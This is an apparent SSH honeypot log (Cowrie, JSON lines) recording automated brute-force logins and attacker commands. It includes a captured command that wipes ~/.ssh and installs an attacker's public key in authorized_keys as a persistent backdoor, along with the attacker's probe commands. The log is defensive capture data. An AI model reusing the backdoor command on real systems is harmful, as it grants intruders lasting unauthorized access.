{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.510030Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.532577Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:39.567533Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.568480Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.569373Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.login.success","username":"root","password":"2605","message":"login attempt [root/2605] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.614894Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:40.077741Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.078598Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.080293Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51076,"dst_ip":"1.2.3.4","dst_port":22,"session":"58e83fd10cc0","protocol":"ssh","message":"New connection: 212.227.235.229:51076 (1.2.3.4:22) [session: 58e83fd10cc0]","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.082056Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.083030Z","src_ip":"212.227.235.229","session":"ae28b72d25a2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.083512Z","src_ip":"212.227.235.229","session":"58e83fd10cc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.103651Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.104710Z","src_ip":"212.227.125.160","session":"84ef9bb54885"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36118,"dst_ip":"1.2.3.4","dst_port":22,"session":"9adf72493d0c","protocol":"ssh","message":"New connection: 212.227.125.160:36118 (1.2.3.4:22) [session: 9adf72493d0c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.125405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.132981Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.148155Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:40.273681Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.274363Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.login.success","username":"root","password":"2589631","message":"login attempt [root/2589631] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.277221Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.305287Z","src_ip":"212.227.235.229","session":"58e83fd10cc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:40.335704Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.336339Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.362090Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.363046Z","src_ip":"212.227.125.160","session":"9adf72493d0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36128,"dst_ip":"1.2.3.4","dst_port":22,"session":"72a7c7c866ed","protocol":"ssh","message":"New connection: 212.227.125.160:36128 (1.2.3.4:22) [session: 72a7c7c866ed]","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.384015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.384672Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.406873Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.451241Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.452060Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.login.success","username":"root","password":"251085","message":"login attempt [root/251085] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.478005Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:40.540397Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.541102Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.564688Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.565782Z","src_ip":"212.227.125.160","session":"72a7c7c866ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.613080Z","src_ip":"186.10.27.2","session":"b0913ceb0cca"}
{"eventid":"cowrie.session.connect","src_ip":"38.47.92.86","src_port":46772,"dst_ip":"1.2.3.4","dst_port":22,"session":"b86c0f6d0af9","protocol":"ssh","message":"New connection: 38.47.92.86:46772 (1.2.3.4:22) [session: b86c0f6d0af9]","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.660475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.661363Z","src_ip":"38.47.92.86","session":"b86c0f6d0af9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.854346Z","src_ip":"38.47.92.86","session":"b86c0f6d0af9"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.861303Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:40.862453Z","src_ip":"186.10.27.2","session":"b0913ceb0cca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:41.207985Z","src_ip":"212.227.235.229","session":"58e83fd10cc0"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:41.421778Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:41.431290Z","src_ip":"212.227.235.229","session":"58e83fd10cc0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:47:41.664439Z","src_ip":"38.47.92.86","session":"b86c0f6d0af9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36144,"dst_ip":"1.2.3.4","dst_port":22,"session":"26ecf4ea611e","protocol":"ssh","message":"New connection: 212.227.125.160:36144 (1.2.3.4:22) [session: 26ecf4ea611e]","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.645285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.646165Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.668634Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.login.success","username":"root","password":"240686","message":"login attempt [root/240686] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.745825Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:42.814330Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.815158Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.838542Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.839774Z","src_ip":"212.227.125.160","session":"26ecf4ea611e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.859703Z","src_ip":"38.47.92.86","session":"b86c0f6d0af9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36158,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f76f83646c","protocol":"ssh","message":"New connection: 212.227.125.160:36158 (1.2.3.4:22) [session: 57f76f83646c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.860570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.861468Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.884134Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.login.success","username":"root","password":"240586","message":"login attempt [root/240586] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:42.958417Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:43.025456Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.026199Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.session.connect","src_ip":"38.47.92.86","src_port":46786,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf1a5752a8fa","protocol":"ssh","message":"New connection: 38.47.92.86:46786 (1.2.3.4:22) [session: cf1a5752a8fa]","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.049515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.050352Z","src_ip":"38.47.92.86","session":"cf1a5752a8fa"}
